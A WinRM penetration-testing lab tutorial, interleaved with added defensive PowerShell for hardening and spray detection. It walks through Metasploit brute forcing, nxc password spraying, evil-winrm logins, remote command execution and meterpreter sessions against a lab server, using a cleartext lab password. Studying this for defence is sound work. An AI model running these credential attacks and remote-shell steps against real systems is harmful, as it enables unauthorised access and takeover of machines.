WinRM Penetration Testing

www.hackingarticles.in
Windows Remote Management (WinRM) is a protocol developed by Microsoft
for remotely managing hardware and operating systems on Windows machines.
It is a component of the Windows Management Framework and implements the
WS-Management Protocol, which is a standard web services protocol designed
for remote management of software and hardware. WS-Management is based
on SOAP and supports the XML schema. WinRM uses port 5985 for HTTP
transport and 5986 for HTTPS Transport.

Table of Contents

• Lab Setup
• Testing the connection
• Lateral Movement (Locally)
o Connecting server using Enter-PSSession
o Connecting server using winrs
o Connecting server using PowerShell
• Lateral Movement (Remotely)
o Scanning
o Identifying the WinRM authentication methods
o WinRM login brute force
o Password spray using nxc
o Exploiting WinRM using Metasploit
• Connecting remote shell using docker
• Connecting remote shell using Ruby script
• Conclusion

Lab Setup
Target Machine: Windows Server 2019 (192.168.31.70)

Standalone Individual Machine: Windows 10

Attacker Machine: Kali Linux (192.168.31.141)

To perform the lab setup, we need to enable and configure the WinRM service on
both the server and the individual machine. Here the individual machine is
Windows 10 and the server is Windows Server 2019.

First we configure WinRM with PowerShell on Windows Server 2019, using the
following procedure:

1. Execution Policy Bypass:

In order to run scripts or perform certain tasks, the execution policy needs to
be bypassed. This method does not change the system-wide execution policy
and applies only to the current PowerShell session. Following is the command:

powershell -ep bypass

2. Enable-PSRemoting:

The Enable-PSRemoting cmdlet configures the computer to receive PowerShell
remote commands that are sent using the WS-Management technology.
Following is the command:

Enable-PSRemoting -force

3. WinRM config:

By default, WinRM listens on port 5985 for HTTP and 5986 for HTTPS. WinRM also
allows connections to be restricted to specific remote hosts; here we use the
wildcard character (*) to allow all machines on the network. Following are the
commands:

winrm quickconfig -transport:https
Set-Item wsman:\localhost\client\trustedhosts *

4. Restart service:

After the configuration is complete, now the service can be restarted using the
following command:

Restart-Service WinRM

One more configuration step is needed: add the administrator user to the local
group Remote Management Users.

Now to configure the individual machine, we perform the same actions we
followed for the server configuration. Note that the Enable-PSRemoting
command gives an error, but the command still executes successfully.
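The same four steps as an added example (not code from the original article), but with TrustedHosts limited to the lab attacker address instead of `*`, followed by a read-back of the settings a reviewer checks; run it as `powershell -ep bypass -File` in an elevated session on the target. It assumes 192.168.31.141 is the only host this box should trust and that `administrator` is the lab account.

```powershell
# Added example, not from the original article. Assumptions: 192.168.31.141 is the only
# host this machine should trust, and 'administrator' is the account used for the lab.
$TrustedClient = '192.168.31.141'
$RemoteUser    = 'administrator'

# Step 2: start the WinRM service, create the HTTP listener and open the firewall rule.
Enable-PSRemoting -Force

# Step 3: TrustedHosts is a client-side list of hosts this machine will send NTLM/Basic
# credentials to without Kerberos. '*' (as used in the article) trusts every host.
Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value $TrustedClient -Force

# HTTPS listener as in the article; this needs a server certificate to exist already.
winrm quickconfig -transport:https -q

# The article's extra step: membership in this built-in group is what lets a
# non-administrator account open WinRM sessions.
$members = (Get-LocalGroupMember -Group 'Remote Management Users').Name
if ($members -notcontains "$env:COMPUTERNAME\$RemoteUser") {
    Add-LocalGroupMember -Group 'Remote Management Users' -Member $RemoteUser
}

# Step 4
Restart-Service WinRM

# Read back what is actually exposed. Worth flagging: Basic enabled, AllowUnencrypted true,
# a wildcard in TrustedHosts, or an HTTP-only listener reachable from untrusted networks.
'--- Listeners ---'
Get-ChildItem WSMan:\localhost\Listener | Select-Object Name, Keys
'--- Service authentication ---'
Get-ChildItem WSMan:\localhost\Service\Auth | Select-Object Name, Value
'AllowUnencrypted: ' + (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value
'TrustedHosts:     ' + (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
'--- Remote Management Users ---'
Get-LocalGroupMember -Group 'Remote Management Users' | Select-Object Name, ObjectClass
'--- Firewall ---'
Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' | Select-Object DisplayName, Enabled, Profile

# The same check the article runs from the client, here against the local listener.
Test-WSMan -ComputerName localhost
```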

Testing the connection
We can check the connection using test-wsman; if the connection is successful
the command returns the version details.

test-wsman -computername "192.168.31.70"

Lateral Movement (Locally)

Since the service is active, we can now try different ways to move laterally
by directly using the WinRM service. Here we assume that we have already
obtained initial access to the system as a user and are now trying to move
laterally.

Connecting server using Enter-PSSession

Enter-PSSession can be used to connect to the remote server: the ComputerName
parameter is the machine we want to connect to, and Credential is the account
that is trusted for remote connections. Once the session is established we can
run system commands.

Enter-PSSession -ComputerName 192.168.31.70 -Credential administrator
Systeminfo

Connecting server using winrs
winrs is another command that uses the WinRM service to connect to remote
systems and execute commands.

winrs -r:192.168.31.70 -u:workstation\administrator -p:Ignite@987 ipconfig

It can also be used to get an interactive shell in which we can then run
commands directly.

winrs -r:192.168.31.70 -u:workstation\administrator -p:Ignite@987 CMD

Connecting server using PowerShell

There is one more method, using the PowerShell Invoke-Command cmdlet: the host
goes in the ComputerName parameter, the account name in the Credential
parameter, and the Authentication type is set to Negotiate. With Negotiate,
PowerShell first tries Kerberos authentication and falls back to NTLM if that
fails. For systems that are not in a domain environment, we need to supply the
Credential. The command to run is given in the ScriptBlock parameter.

Invoke-Command -ComputerName "192.168.31.70" -Credential workgroup\administrator -Authentication Negotiate -Port 5985 -ScriptBlock {net user administrator}

We can also create a credential object, cred, that takes the password as an
argument. To create a SecureString we need to pass the -AsPlainText and -Force
parameters, otherwise it gives an error. The secure password string is then
passed to the PSCredential class from the System.Management.Automation
namespace to build the cred object.

$pass = ConvertTo-SecureString 'Ignite@987' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('workstation\administrator', $pass)
Invoke-Command -ComputerName 192.168.31.70 -Credential $cred -ScriptBlock { ipconfig }

Lateral Movement (Remotely)


Scanning

To connect to the WinRM service remotely, we first need to perform
enumeration.

nmap -p5985,5986 -sV 192.168.31.70

It can be seen that port 5985 is open and supports HTTP for WinRM
connections.

Identifying the WinRM authentication methods
The winrm_auth_methods auxiliary module in Metasploit can be used to
determine the authentication methods. If WinRM is supported, this auxiliary
will

use auxiliary/scanner/winrm/winrm_auth_methods
set rhosts 192.168.31.70
run
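The check that winrm_auth_methods performs, done by hand in PowerShell as an added example (not code from the article or from the Metasploit module): an unauthenticated POST to /wsman is answered with 401, and one WWW-Authenticate header per accepted mechanism lists what the listener will negotiate. It assumes the HTTP listener on 5985 found by the nmap scan; the function name and the BasicOverHttp field are this example's own.

```powershell
# Added example, not from the article. Assumes an HTTP WinRM listener on port 5985.
function Get-WinRMAuthMethods {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [int]$Port = 5985,
        [switch]$UseSsl
    )
    $scheme = if ($UseSsl) { 'https' } else { 'http' }
    $req = [System.Net.HttpWebRequest]::Create("${scheme}://${ComputerName}:${Port}/wsman")
    $req.Method        = 'POST'
    $req.ContentType   = 'application/soap+xml;charset=UTF-8'
    $req.ContentLength = 0
    $req.Timeout       = 5000
    try {
        $resp = $req.GetResponse()          # a 2xx here would be unexpected for WinRM
    } catch [System.Net.WebException] {
        $resp = $_.Exception.Response       # the 401 we actually want to inspect
        if (-not $resp) { throw }           # refused / timed out: no headers to read
    }
    $status  = [int]$resp.StatusCode
    $headers = $resp.Headers.GetValues('WWW-Authenticate')
    $resp.Close()
    # Each header looks like 'Negotiate', 'Kerberos' or 'Basic realm="WSMAN"'; keep the scheme token.
    $methods = @($headers | ForEach-Object { ($_ -split '\s+')[0] } | Sort-Object -Unique)
    [pscustomobject]@{
        Target     = "${ComputerName}:${Port}"
        StatusCode = $status
        Methods    = $methods
        # Basic advertised on the HTTP listener is the first thing to flag in a review:
        # WinRM only lets it through when Service\Auth\Basic is enabled, and without
        # HTTPS or message encryption the credential crosses the wire as base64 text.
        BasicOverHttp = ($methods -contains 'Basic') -and (-not $UseSsl)
    }
}

# Same target as the Metasploit run above.
Get-WinRMAuthMethods -ComputerName 192.168.31.70
```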

WinRM login brute force


A brute force attack on WinRM can also be performed to find valid
credentials. Here we use the auxiliary/scanner/winrm/winrm_login module
inside Metasploit, keeping DOMAIN at its default, i.e. WORKSTATION. The
usernames are specified in user_file and the passwords in pass_file.

use auxiliary/scanner/winrm/winrm_login
set rhosts 192.168.31.70
set user_file users.txt
set pass_file pass.txt
set password N/A
run
sessions 1

It can be seen that once the valid credentials are found, the session is obtained.

Password spray using nxc
nxc can be used to perform a password spray on the WinRM service; we just need
to pass the username and password files as input.

nxc winrm 192.168.31.70 -u users.txt -p pass.txt

Once a valid username and password are obtained, we can log in to the remote
system using the evil-winrm tool.

evil-winrm -i 192.168.31.70 -u administrator -p Ignite@987

After valid credentials are found, we can also run commands directly with nxc
by giving the -x flag.

nxc winrm 192.168.31.70 -u administrator -p Ignite@987 -x ipconfig
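The winrm_login and nxc runs above, seen from the target's side, as an added example (not code from the article): each failed WinRM logon lands in the Security log as event 4625 with LogonType 3 (network), and a spray shows as one source address failing against many different accounts in a short window. The function name and thresholds are this example's own assumptions and would be tuned per environment.

```powershell
# Added example, not from the article. Run on the target (192.168.31.70) as an administrator.
function Find-WinRMSpray {
    param(
        [int]$Minutes = 10,        # look-back window
        [int]$MinAccounts = 5,     # distinct usernames from one IP before we call it a spray
        [int]$MinFailures = 10     # and at least this many failures overall
    )
    $since  = (Get-Date).AddMinutes(-$Minutes)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $since } -ErrorAction SilentlyContinue
    $rows = foreach ($e in $events) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }
        if ($d['LogonType'] -ne '3') { continue }   # network logons only (WinRM, SMB, ...)
        [pscustomobject]@{
            Time   = $e.TimeCreated
            Source = $d['IpAddress']
            User   = $d['TargetUserName']
            Status = $d['Status']                   # 0xC000006D = unknown user or bad password
        }
    }
    $rows | Group-Object Source | ForEach-Object {
        $accounts = @($_.Group.User | Sort-Object -Unique)
        if ($_.Count -ge $MinFailures -and $accounts.Count -ge $MinAccounts) {
            [pscustomobject]@{
                Source   = $_.Name
                Failures = $_.Count
                Accounts = $accounts.Count
                First    = ($_.Group.Time | Measure-Object -Minimum).Minimum
                Last     = ($_.Group.Time | Measure-Object -Maximum).Maximum
                Sample   = ($accounts | Select-Object -First 5) -join ','
            }
        }
    }
}

Find-WinRMSpray -Minutes 30 | Format-Table -AutoSize

# WinRM keeps its own operational log; its session events corroborate that the 4625s
# arrived over WS-Management rather than SMB or another network logon path.
Get-WinEvent -LogName 'Microsoft-Windows-WinRM/Operational' -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message | Format-Table -Wrap
```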

Exploiting WinRM using Metasploit
Once we have found valid credentials, we can perform command execution
using the auxiliary/scanner/winrm/winrm_cmd module inside Metasploit.
Following are the commands:

use auxiliary/scanner/winrm/winrm_cmd
set rhosts 192.168.31.70
set cmd ipconfig
set username administrator
set password Ignite@987
run

We can also obtain a meterpreter session once we have valid credentials.
The exploit/windows/winrm/winrm_script_exec module can be used to execute the
script. This exploit automatically tries to perform privilege escalation by
migrating to a system-level process.

use exploit/windows/winrm/winrm_script_exec
set rhosts 192.168.31.70
set username administrator
set password Ignite@987
run

WQL (WMI Query Language) is a specialized subset of SQL (Structured Query
Language) designed for querying data within the Windows Management
Instrumentation (WMI) framework.

Once valid credentials for the WinRM service are obtained, the WMI
functionality can be exploited to execute arbitrary WQL queries on the target
system. The module will also store the results of these queries as loot.

Here we can give the query to fetch the service Name and Status from the
Win32_Service.

use auxiliary/scanner/winrm/winrm_wql
set rhosts 192.168.31.70
set username administrator
set password Ignite@987
set wql Select Name,Status from Win32_Service
run

Connecting remote shell using docker
We can run a Docker image of PowerShell with NTLM support to allow
PS-Remoting from Linux to Windows. Once inside the container we supply the
valid credentials and get a session through Enter-PSSession.

docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 192.168.31.70 -Authentication Negotiate -Credential $creds

Connecting remote shell using Ruby script

We can also connect to a remote server that has WinRM enabled using a Ruby
script. The script can be downloaded from here:

https://raw.githubusercontent.com/Alamot/code-snippets/master/winrm/winrm_shell_with_upload.rb

We need to modify this script by giving a valid username, password and
endpoint.

cat winrm_shell_with_upload.rb

Once we have modified the script, we can execute it using ruby.

ruby winrm_shell_with_upload.rb
ipconfig /all

Conclusion
WinRM is a very useful service for day-to-day tasks; however, if it is not
configured properly it can be abused by attackers to gain shell access. Hence
it is recommended to grant authentication permissions only to trusted users
and not to everyone.
